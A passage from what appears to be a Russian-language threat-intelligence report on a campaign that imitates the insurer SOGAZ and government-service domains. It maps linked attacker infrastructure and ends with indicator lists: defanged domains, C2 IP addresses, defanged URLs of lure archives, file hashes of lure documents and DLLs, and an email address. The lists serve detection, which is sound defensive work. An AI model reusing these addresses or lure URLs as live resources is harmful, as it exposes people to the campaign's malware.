Рис. 16 — Информация о связях доменов, полученная с использованием идентификатора владельца ресурса
Рис. 16 — Информация о связях доменов, полученная с использованием идентификатора владельца ресурса

Вторая группа, связанная с files-sogaz[.]ru, sogaz-files[.]ru, sogaz-filesharing[.]ru и filesharing-sogaz[.]ru, объединена с доменами:

● tikhodoma[.]ru

● coveragepro[.]ru

● coconutt[.]ru

● sinij-led[.]ru

● yasnyydenek[.]ru

● life-cover[.]ru

● yiemoosh[.]ru

● over-there[.]ru

● zohse[.]ru

● зохсе[.]рф

● svezhiysneg-u[.]ru

● wwwzohse[.]ru

● riskcover[.]ru

Рис. 17 — Информация о связях доменов, полученная с использованием идентификатора владельца ресурса
Рис. 17 — Информация о связях доменов, полученная с использованием идентификатора владельца ресурса

Кроме того, в результате применения аналогичного метода к С2-адресам, выявленным в ходе технического исследования, обнаружены следующие домены и хосты:

sambastore[.]ru 81[.]200[.]146[.]214
tlswebsurfing[.]ru
updatewebrtc[.]ru
a620c2c5ac798105429ab0bb992e305c[.]ru 188[.]225[.]39[.]88
adwordstatistics[.]ru 5[.]129[.]204[.]97
conclouds[.]ru 5[.]129[.]204[.]97
cyber-mining[.]ru 188[.]225[.]39[.]88
cyberkarel[.]ru 81[.]19[.]136[.]240
equipads[.]ru 188[.]225[.]39[.]88
glonastracking[.]ru 85[.]193[.]91[.]18
gpslivestreaming[.]ru 80[.]90[.]184[.]187
gpsspoofing[.]ru 201[.]51[.]8[.]163
highloadvpn[.]ru 201[.]24[.]60[.]146
k8s-security[.]ru 81[.]31[.]247[.]40
netstreaming[.]ru 81[.]200[.]146[.]207
safe-surfing[.]ru 72[.]56[.]11[.]232
safelearning[.]ru 186[.]246[.]7[.]134
sogaz-tn[.]ru 5[.]129[.]197[.]194
sslfingerprinting[.]ru 92[.]246[.]76[.]17
testsalesmarketing[.]ru 81[.]200[.]146[.]190
tlswebstore[.]ru
tnbreachforum[.]ru 81[.]200[.]146[.]207
tnbusiness[.]ru 85[.]239[.]56[.]43, 91[.]195[.]12[.]80
web-tracking[.]ru 201[.]51[.]28[.]213
webadstitistics[.]ru
webssltracking[.]ru 81[.]19[.]136[.]240
24webdav[.]ru 186.246.28.223
marketlearning[.]ru 92.255.108.79
webanalitycs[.]ru 92.255.108.79
trafficanalyze[.]ru 185.207.66.83
24internetsales[.]ru 176.57.208.33
websogaz[.]ru
safebrowser[.]ru
cloudinformation[.]ru 83.217.202.9

Стоит отметить, что группировка продолжает расширять свою инфраструктуру, при этом связывая ее с ранее используемой. Так, удалось выявить новые связи SSL-сертификата 72a415851df62e54af7da6c4489b08a6763712ae, ранее связанного с доменом cdn-sogaz.ru (191.44.37.235), со следующими хостами и доменами:

● rugosuslugi[.]email

● mail.rugosuslugi[.]email

● gosuslugi[.]email

● minfin[.]support

● mail.minfin[.]support

● 194[.]87[.]57[.]4

● 194[.]87[.]254[.]182

● 194[.]87[.]57[.]130

● 45[.]10[.]247[.]234

Указанные обстоятельства позволяют предположить возможное изменение как вектора атак, так и тематической направленности файлов-приманок, используемых атакующими.

Индикаторы компрометации

Сетевые индикаторы

filesharing-sogaz[.]ru

cdn-sogaz[.]ru

sogaz-cdn[.]ru

sogaz-files[.]ru

webdav-sogaz[.]ru

sogaz-webdav[.]ru

files-sogaz[.]ru

sogaz-filesharing[.]ru

files-sogaz[.]ru

f1iles-sogaz[.]ru

oak-fern[.]ru

wild-harbor[.]ru

darkvale[.]ru

zashchita-semyi[.]ru

tvoyapolis[.]ru

polisstrah[.]ru

tikhodoma[.]ru

coveragepro[.]ru

coconutt[.]ru

sinij-led[.]ru

yasnyydenek[.]ru

life-cover[.]ru

yiemoosh[.]ru

over-there[.]ru

zohse[.]ru

зохсе[.]рф

svezhiysneg-u[.]ru

wwwzohse[.]ru

riskcover[.]ru

sambastore[.]ru

tlswebsurfing[.]ru

updatewebrtc[.]ru

a620c2c5ac798105429ab0bb992e305c[.]ru

adwordstatistics[.]ru

conclouds[.]ru

cyber-mining[.]ru

cyberkarel[.]ru

equipads[.]ru

glonastracking[.]ru

gpslivestreaming[.]ru

gpsspoofing[.]ru

highloadvpn[.]ru

k8s-security[.]ru

netstreaming[.]ru

safe-surfing[.]ru

safelearning[.]ru

sogaz-tn[.]ru

sslfingerprinting[.]ru

testsalesmarketing[.]ru

tlswebstore[.]ru

tnbreachforum[.]ru

tnbusiness[.]ru

web-tracking[.]ru

webadstitistics[.]ru

webssltracking[.]ru

24webdav[.]ru

marketlearning[.]ru

webanalitycs[.]ru

trafficanalyze[.]ru

24internetsales[.]ru

websogaz[.]ru

safebrowser[.]ru

cloudinformation[.]ru

rugosuslugi[.]email

mail[.]rugosuslugi[.]email

gosuslugi[.]email

minfin[.]support

mail[.]minfin[.]support

191[.]44[.]37[.]222

81[.]200[.]146[.]214

188[.]225[.]39[.]88

5[.]129[.]204[.]97

5[.]129[.]204[.]97

188[.]225[.]39[.]88

81[.]19[.]136[.]240

188[.]225[.]39[.]88

85[.]193[.]91[.]18

80[.]90[.]184[.]187

201[.]51[.]8[.]163

201[.]24[.]60[.]146

81[.]31[.]247[.]40

81[.]200[.]146[.]207

72[.]56[.]11[.]232

186[.]246[.]7[.]134

5[.]129[.]197[.]194

92[.]246[.]76[.]17

81[.]200[.]146[.]190

81[.]200[.]146[.]207

85[.]239[.]56[.]43

91[.]195[.]12[.]80

201[.]51[.]28[.]213

81[.]19[.]136[.]240

186[.]246[.]28[.]223

92[.]255[.]108[.]79

92[.]255[.]108[.]79

185[.]207[.]66[.]83

176[.]57[.]208[.]33

83[.]217[.]202[.]9

104[.]171[.]130[.]199

191[.]44[.]37[.]235

191[.]44[.]38[.]70

5[.]129[.]200[.]198

62[.]76[.]228[.]28

80[.]64[.]31[.]126

83[.]217[.]200[.]210

188[.]225[.]27[.]102

83[.]217[.]200[.]210

194[.]87[.]57[.]4

194[.]87[.]254[.]182

194[.]87[.]57[.]130

45[.]10[.]247[.]234

hxxps://sogaz-filesharing[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1[.]rar

hxxps://sogaz-cdn[.]ru/%D0%A1%D1%82%D1%80%D0%B0%D1%85%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%80%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2[.]zip

hxxps://cdn-sogaz[.]ru/%D0%A1%D1%82%D1%80%D0%B0%D1%85%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D1%80%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2[.]zip

hxxps://sogaz-files[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1[.]rar

hxxps://files-sogaz[.]ru/%D0%98%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B2%20%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B5%20%D0%94%D0%9C%D0%A1[.]rar

hxxps://vc[.]ru/id6030334/3009787-gde-nayti-zapchasti-dlya-great-wall-safe

cs[.]telemost-ads[.]net

Файловые индикаторы

ДМС обновления.pdf

MD5: 2a53dfa258bb8abfeae1e20595e14014

SHA-1: 9a5d438119eb1548aa5db803eeefb4fcbad12344

SHA-256: 785ec0fc82c45f4fb600340ed3c3f582e6c29725a180b39009024753643dbd02

Изменения в программе ДМС.rar

MD5: 14375ffa161b02548c7699fbe05477a5

SHA-1: 01bfd6f549ae0b6458bb26b605dbdc2e468ef576

SHA-256: c588e7958a0eeec25347f8993ba1abf6d8d1c299739083312a25d31e87304358

settings

MD5:c4d1d8254ab8fad5b4efa9fc87d8473c

SHA-1: 896bae561c66b3f82ced36deed075b47f5b46069

SHA-256: 6460ef48514f652fdc8f5e56803a7e4d6370ed406eaafaa0c173e7f44618a9e7

C2R64.dll

MD5: ff5e61aa81873c7263dfb0a35ea1bfe6

SHA-1: 57cbbf5ab2d5571fef8a2093806ca56372069343

SHA-256: 471e89b0d081bb9bc8b5e876526373e317d2b326e78e442ea6b6d2a39b931012

ДМС для родственников.pdf

MD5: 43037ea31f38d1bbf131a67918f19585

SHA-1: 470dd3478be26d5cfdca38f95f585dd9d9374780

SHA-256: 954f1516b702b0f1843f83702334b344c5ad4ad82a95118beb6c70415d04a62f

Страхование родственников.zip

MD5:fc64807fa97c70db3b1cb094cf6a0bc6

SHA-1: fdb431b2bdea01be2a1b543accaf41efe25b6b05

SHA-256:e2a16f7aeb6da4700f4af286390c37a63ffb78dde52519c556fd8aca46d472f2

resources

MD5: 314ec62be384ce89603dff4e5d55bd12

SHA-1: a43e9145e9905024f04fb95a3a6982227f8f794c

SHA-256: 10e8d27132719be7e932df86c910cd37d815d686a94513a0816a3204c7a0627c

C2R64.dll

MD5: 0f64df18a0feb2ba3217c5be301749d6

SHA-1: 93fc8fe2f27dac35febf56657097d90829d11c7c

SHA-256: c7b431b3685830812e3f53830571146d576971cf1314ad7f1f3283bd7e221079

ДМС для родственников.pdf

MD5: e2ea5b422ccb40222d9623b2ae03448a

SHA-1: effef9a2ba91dacbf9a123d9b8b4dafbd5613db9

SHA-256: 01dc2a5db68a83fc1b8a4c64f066bedd75850907139c1947a1c75ccaee47b25d

Страхование родственников.zip

MD5: 3d1f74f4c20c25881f7f9efe1878719f

SHA-1: 825a2dd36396be4cc51f150744ff4fd4697f03ad

SHA-256: 458f55cba43e14e1fe2aab2f97bfa376241e86d4b11c2be73f84f7b76ae30856

C2R64.dll

MD5: e7e2d14397a9be2acc598c98b0ad7f7b

SHA-1: 906a389fa80e570199b8ba6692294f48610127e1

SHA-256: b6828b6e22bfda8bfaac368d6e94300cf86a214932d87cf725c38c1016a65bce

ДМС обновления.pdf

MD5:b87c2dbabb318cf2ab6947e85d52d27a

SHA-1: 6c5d283d80dfac7d5a775084281c665fce307acd

SHA-256: 2d639486996eed76fe06905f210c3ee360d85a59b96ab6af1cff239324db81b8

Изменения в программе ДМС.rar

MD5: e2604bacef9c23ee510547cd7aa44244

SHA-1: 7f8035c8dad5663b0e7112ddba62be3420a3f23e

SHA-256: c97379c3319156ad33f4df27be25ab44a7b38aba21621a1169d3af58f95f948a

C2R64.dll

MD5: 06dd1e25d44d52fd188f9d501f8d8626

SHA-1: e5932991c81f015cb678b9ab02a3c51914efd9ce

SHA-256: 3c1ed43e91ad12399f2c14434c25ca43e26aaf8f2767f481948559c940bc0cad

ДМС обновления.pdf

MD5: 758d28c3e4484b82f9070a0abeb59477

SHA-1: e006219905c91a14432dd8b1e468882ecc212dd7

SHA-256: a8dbb91fb6ec561c7b1554537bff0799ed5941bde9d4f758401b8cf107a44c4a

Изменения в программе ДМС.rar

SHA-1: baf64b0441921b7129cb973519f121c2dece790f

C2R64.dll

MD5: 2dc1f3410ca3ae2fd452f3004f1f665e

SHA-1: b6288e75a53ccdbcfca034d153950147937dd77b

SHA-256: a947080736183dc4ab44b74295485845bcf2e7e967e7e47df7740ecefbf70a3c

Пенсионные отчисления.rar

MD5: f9f3ca371bb9c0aa64185effa1eeaf27

SHA-1: 59c13de01add9c7eb1285d6c689cd8dc72ba7ea0

SHA-256: 4458f7533d09a9b1f1c7d7f6075879d98095c7903bdcbe49a75c8a1ac3c8243f

db

MD5: 2f9e21230d9701631f85c40040ac48cd

SHA-1: f55958b10092257aa6389f5aba6f04f1a6511874

SHA-256: dc07a797598bfe0ada60e5c9ccee27a19323c164ec35f7f7d4c26b214e2ce05e

C2R64.dll

MD5: 64429fa463a711a7c6910db1733bafb9

SHA-1: 9ea8a180f1e04e2b89bf7339bf174c1687952b16

SHA-256: 2cf596676de68119b31e45052f0f26753875f0d4e6d65787319d19aca453b136

Зарплатный проект ***нефть (2).zip

MD5: a68f2d10f149f2185fa209508fad3178

SHA-1: fb941439c46df1c4c6b09be37f7b3e0ce38c2979

SHA-256: 425fec493af7187a10760b7ed888a6839cd6703572d2796bd264dbdab6dcf481

config

MD5: 1638188f3a416424e18704ca8c451914

SHA-1: 98cdaacd7d9085a16dbd8494b6fa76fc5aaa5949

SHA-256: 66fb545649c8c7cc912072742ac77ce0c2a7e0ec002bff43313676160accbcf7

AppVIsvSubsystems64.dll

MD5: ef7dbd7ddeaceef80e9e00d034586bbc

SHA-1: b643e3d44d1953e730728255c458c13ebba4c789

SHA-256: a234b1864bbeffa88391c8e503e877a5cacce0ae679f1775cea2ed9caca9d1d5

Zip-архив

MD5: 6488cc4e92365c0c968af1473c3e3e5d

SHA-1: 8c496e00831b32e985bfe6925cee7691bc74b81f

SHA-256: 32bce653a84d6c7a1cc2cb6eefbfe4142ee85be0cff506a7067ba7327d3ef925

AppVIsvSubsystems64.dll

MD5: 3cf9b955e6e77f97b110940395c628c8

SHA-1: 3c17498eb5c8ec311cab53f497e7a30da954f5dd

SHA-256: 06c26c1647749fbda1299152aad859197fa966cc90244a060daac326109a1d65

Zip-архив MD5: 5de35e48fae8b7cf459f4bfa8171a6ea

SHA-1: 5a386ee1dcdeb9fedb4ff97caf0e3c52b9b8a248

SHA-256: 523c5ba13d92401322e4895cb17fcaf4ff1ac4a4812a7071ff269394c60ea54e

AppVIsvSubsystems64.dll

MD5: 196f7cb61c5707899ef93324dd18654b

SHA-1: b4a3e7a911a8193c4b2cc44032523f2dacc5d2a4

SHA-256: 671f0b67692344018c54cdc1e88853bd0bdd5fa2263da214ae1fd51d3ffa8bc9

Zip-архив MD5: c0cbefb2ff4caadd34ae4a0342862d65

SHA-1: f130faf86e3ac0a4685ba5ef9181b59b8443927a

SHA-256: 933acb8386d27df2039e43091819e346995d95e96d08d6340ceee329dc3d2a9d

C2R64.dll

MD5: 06dd1e25d44d52fd188f9d501f8d8626

SHA-1: e5932991c81f015cb678b9ab02a3c51914efd9ce

SHA-256: 3c1ed43e91ad12399f2c14434c25ca43e26aaf8f2767f481948559c940bc0cad

Zip-архив MD5: 4a4d959254959739f3bb247d7188a77b

SHA-1: 6504f576ad38f04104702a9d6c569adf341e1376

SHA-256: 14537a865d98cfabc43953ed504e82b1132cfeb5c31833ef0c1f00cf93650f73

C2R64.dll

MD5: 1101cc8f94d2073ee395976e450a8278

SHA-1: a0e0ec0e6246dbf9a82cde34d9a95532b3fbec3c

SHA-256: 503bbb25e8fe69d46c308ea09d37e6e9e442d2e1aaec1b8ec0de67f11f209712

Зарплатный проект.htm

MD5: b6b79d6a0ac05d16aff79594231c901a

SHA-1: cfe266f0aa8629fd724d3af1ce496c49c6218a92

SHA-256: d553194e4e13ae735b7c6300d17d350fd87123864f451936168bef1854960cf3

Зарплатный проект ***нефть.zip

MD5: 57c6762d79c3a2af152090d03bcc662d

SHA-1: 2570d0a0fccfa0532cce43f8e44f12b0b5ecb027

SHA-256: 56902513bd5ffbebc60d6d06172692fb2cc2c2bd2a688612f5b2f450ffd9c094

AppVIsvSubsystems64.dll

MD5: 0226a9a14ccee68f433f7582eac777e3

SHA-1: ee5dd0c98709e645c3e13ec2da0136dd9dd4ae17

SHA-256: d02313d8ff6f863337eae6e6931ab801c22ff5c9e5e89a926586a3fee3b328d1

Специальное предложение.shtml

MD5: 192a11db30b71c12a562f7dea5b65328

SHA-1: 626360ea0408845db2e0dfab23ba1a2b1b767956

SHA-256: 9c7457ecb26e6e96e8be86998a12d9c7c4c9fa94e4a09dc1f7fe6bce87759223

Специальное предложение ***нефть.rar

MD5: 26a4f78cb4c70cb70b917d3013aa4eb2

SHA-1: 7db4f6ecbdf4955d411ab947110d5b6a12622662

SHA-256: e9d63f9954ce84e0e8888d55aed1bdd37045f5a19c2ac0418621fe81e75da9a0

storage

MD5: 573e211a6191223cb869e73b5e4e4aba

SHA-1: 8b43c1d85a2db0f62c5fa644d4db0a32efb962ec

SHA-256: 22e64643f9b2b12c098a8fed5d651113737ddb161564b2c64ca928111aa5b4dc

AppVIsvSubsystems64.dll

MD5: 2c1daeccd6a2e914d1375f9b0110bfbf

SHA-1: a84ee1d39ec05b362a3b84a7680aa1e304e0acd0

SHA-256: df0e0fdfcb6d861becb59dbd410b8b30538de4084f421e7e6a6783cdc7b63e16

AppVIsvSubsystems64.dll

MD5: 01a1e9d4d8ae50f0211ff49d048a5edf

SHA-1: 33cc837d54834d25aabd3b2c885eb7f6398ffc96

SHA-256: f39460c8b2a20cb2b1da2bf84a495d8733e72d4be91eafd78f7d19ba03703565

C2R64.dll

MD5: 8091a5eb9f562e834e698499499c8bb5

SHA-1: 740375e7e88229ba6035afe00b21a0c2f91d4f2a

SHA-256: e43c9fe383550b23389bc6f61d67c6684cbfb3a8ec66d0e75a44636282084097

rpc64.dll

MD5: 3c6374a5c0919dcae515a94716e3a06e

SHA-1: ac0f4222088f4dea22d890e7c294a53eb867b640

SHA-256:64407a8b44d1297fc4833e40c83c2be21b0be487f8424d445572f184f9c73deb

rpc64.dll

MD5: 46783c1d81946270ecaa7c362637a816

SHA-1: 4d107d9ba2ed6416c4dab448b907f0dcaa76fada

SHA-256: 693244548d523aef107176a1f173b4c17b9b51b8982bd08d1a9205a1afd1818a

Адрес электронной почты

mutewinter78@gmail.com